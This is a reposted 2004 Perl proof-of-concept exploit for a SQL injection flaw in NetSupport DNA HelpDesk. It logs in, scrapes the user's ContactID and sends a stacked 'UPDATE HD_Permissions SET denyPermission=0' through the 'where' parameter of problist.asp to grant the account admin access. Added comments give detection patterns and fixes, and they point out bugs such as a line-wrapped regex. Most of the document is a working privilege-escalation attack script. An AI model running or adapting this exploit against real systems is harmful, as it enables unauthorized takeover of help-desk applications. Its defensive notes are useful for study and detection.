NetSupport DNA HelpDesk SQL Injection Exploit
来源:vfocus.net 作者:vfcous 发布时间:2004-07-23  

NetSupport DNA HelpDesk SQL Injection Exploit


#!/usr/bin/perl
#
# NetSupport DNA HelpDesk SQL injection proof-of-concept (published 2004).
#
# What the script does, in order:
#   1. GET  /$path/logon.asp             -> collect the initial session cookie(s)
#   2. POST /$path/logon.asp             -> log on with the supplied e-mail/password
#   3. GET  /helpdesk/createContact.asp  -> scrape the caller's own ContactID from
#                                           a hidden form field
#   4. GET  /$path/problist.asp?where=... -> pass a stacked SQL statement through
#                                           the "where" query parameter that clears
#                                           denyPermission for that ContactId
#
# Defender notes (everything below is visible in the requests this script builds):
#   - The vulnerable sink is the "where" parameter of problist.asp, which the
#     request in step 4 treats as a raw SQL WHERE clause: "1=0 order by TicketId"
#     is followed by ";" to start a second statement and "--" to comment out
#     whatever the application appends. The fix on the application side is to
#     never concatenate client input into SQL -- use parameterised queries and
#     an allow-list for any client-selectable filter/sort column.
#   - Detection: web-server logs with problist.asp requests whose query string
#     contains ";", "UPDATE", "HD_Permissions" or "--" (URL-encoded or not); a
#     normal client never sends those.
#   - Impact depends on the database login the application uses: the UPDATE in
#     step 4 only succeeds if that login may write HD_Permissions, so a
#     least-privilege DB account bounds what an injection can change.
#   - All traffic, credentials included, goes over plain HTTP to port 80.
#
# Code notes: the script enables `use strict` but not `use warnings`; with
# warnings on, the second `my $remote` below would be reported as masking the
# earlier declaration, and an undefined $ContactID would warn when interpolated.

use IO::Socket;
use strict;

# Set to 1 to echo every raw request and response to STDOUT.
my $verbose = 0;

# Exactly four positional arguments are expected: host path email password.
if (($#ARGV+1) < 4)
{
print "Usage (Provided only ".($#ARGV+1)." parameters):\n";
print "DNAHack.pl host path email password\n";
print "host - IP/name formed (e.g. 192.168.1.243)\n";
print "path - The path under which the product is installed (e.g.
/HelpDesk/)\n";
print "email - The email used to logon (e.g. example\@com.com)\n";
print "password - The password used for the email provided (e.g.
foobar)\n";
exit(0);
}

# Neither value is validated; both are interpolated verbatim into the
# request line and Host header of every request below.
my $host = $ARGV[0];
my $path = $ARGV[1];

# Plain TCP connection to port 80 (no TLS); one connection per request
# because every request carries "Connection: close".
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

if ($verbose)
{
print "connected\n";
}

$remote->autoflush(1);

# Credentials of an ordinary (already valid) HelpDesk account.
my $Email = $ARGV[2];
my $Password = $ARGV[3];

print "Grabbing initial cookie\n";

# Step 1: unauthenticated GET of the logon page, only to harvest Set-Cookie
# headers from the response.  The request is one multi-line string literal.
my $http = "GET /$path/logon.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405
Firefox/0.8
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,ima
ge/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://$host/$path/logon.asp

";

print $remote $http;
if ($verbose)
{
print "HTTP: [".$http."]\n";
}

# Presumably gives the server a moment to answer before the response is read.
sleep(1);

# Accumulate every "name=value;" from Set-Cookie headers (text up to the
# first ';') into one space-separated string reused as the Cookie header.
my $Cookie = "";
while (<$remote>)
{
if (/Set-Cookie: ([^;]+;)/)
{
$Cookie .= $1." ";
}
if ($verbose)
{
print "$_";
}
}

print "Cookie: $Cookie\n";

close($remote);

# Second connection for the logon POST.  Note the redeclaration of $remote
# with `my` in the same scope (silent without `use warnings`).
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

if ($verbose)
{
print "connected\n";
}

$remote->autoflush(1);

print "Performing logon\n";

# Step 2: form POST to logon.asp, replaying the cookies collected above.
# Content-Length is left open here and appended once the body is known.
$http = "POST /$path/logon.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405
Firefox/0.8
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: $Cookie
Connection: close
Referer: http://$host/$path/logon.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: ";

# Form fields of the logon page; e-mail and password are sent in the clear
# and are not URL-encoded, so values containing '&' or '=' would be mangled.
my $content =
"EmailAddress=$Email&password=$Password&action=submit&submitBtn=Logon&Redirect=";

# Byte length of the body, then the blank line that terminates the headers.
$http .= length($content) ."\r\n";

$http .= "\r\n$content";

print $remote $http;
if ($verbose)
{
print "HTTP: [".$http."]\n";
}

sleep(1);

# Any cookies issued on successful logon are appended to the same string.
while (<$remote>)
{
if (/Set-Cookie: ([^;]+;)/)
{
$Cookie .= $1." ";
}

if ($verbose)
{
print "$_";
}
}

close($remote);

print "Cookie: $Cookie\n";

print "Grabbing ContactID\n";

# Third connection: fetch the "edit my own contact" page as the logged-on user.
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }

if ($verbose)
{
print "connected\n";
}

$remote->autoflush(1);

# Step 3.  This request uses a literal "/helpdesk/" prefix rather than $path,
# unlike every other request in the script.
$http = "GET /helpdesk/createContact.asp?editself=1 HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405
Firefox/0.8
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Cookie: $Cookie

";

# Stays undef unless the hidden-field pattern below matches a response line.
my $ContactID;

print $remote $http;

sleep(1);

# Scrape the numeric value of the hidden <input id="ContactID"> field.
# NOTE(review): as reproduced here the pattern contains a line break between
# the name= and value= attributes (no /x modifier), so it only matches a
# response line that wraps at exactly that point; otherwise $ContactID stays
# undef and the final request interpolates an empty ContactId.
while (<$remote>)
{
if (/<input type="hidden" id="ContactID" name="ContactID"
value="([0-9]+)">/)
{
$ContactID = $1;
}
if ($verbose)
{
print "$_";
}
}

close $remote;

print "ContactID: $ContactID\n";

print "Gaining elvated privileges\n";

# Fourth connection: the injection request itself.
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }
if ($verbose)
{
print "connected\n";
}
$remote->autoflush(1);

# Step 4.  The "where" parameter carries, URL-encoded:
#   1=0 order by TicketId; UPDATE HD_Permissions SET denyPermission=0
#   WHERE ContactId=<ContactID> --
# i.e. a stacked UPDATE after ';' and a '--' comment that discards whatever
# SQL the page appends.  This is the string a WAF rule or log search should
# key on (problist.asp + ';' / 'UPDATE' / 'HD_Permissions' / '--' in the
# query string).
$http = "GET
/$path/problist.asp?where=1%3D0+order+by+TicketId;+UPDATE+HD_Permissions+SET+denyPermission=0+WHERE+ContactId=$ContactID+-- HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405
Firefox/0.8
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Cookie: $Cookie

";

print "Gaining privileges\n";
print $remote $http;
sleep(1);

# The response is not inspected; it is only echoed in verbose mode, so the
# script cannot tell whether the UPDATE actually ran.
while (<$remote>)
{
if ($verbose)
{
print "$_";
}
}
print "\n";

close $remote;

print "Logon to the system as before, you should be able to view the
'Admin' menu\n";



 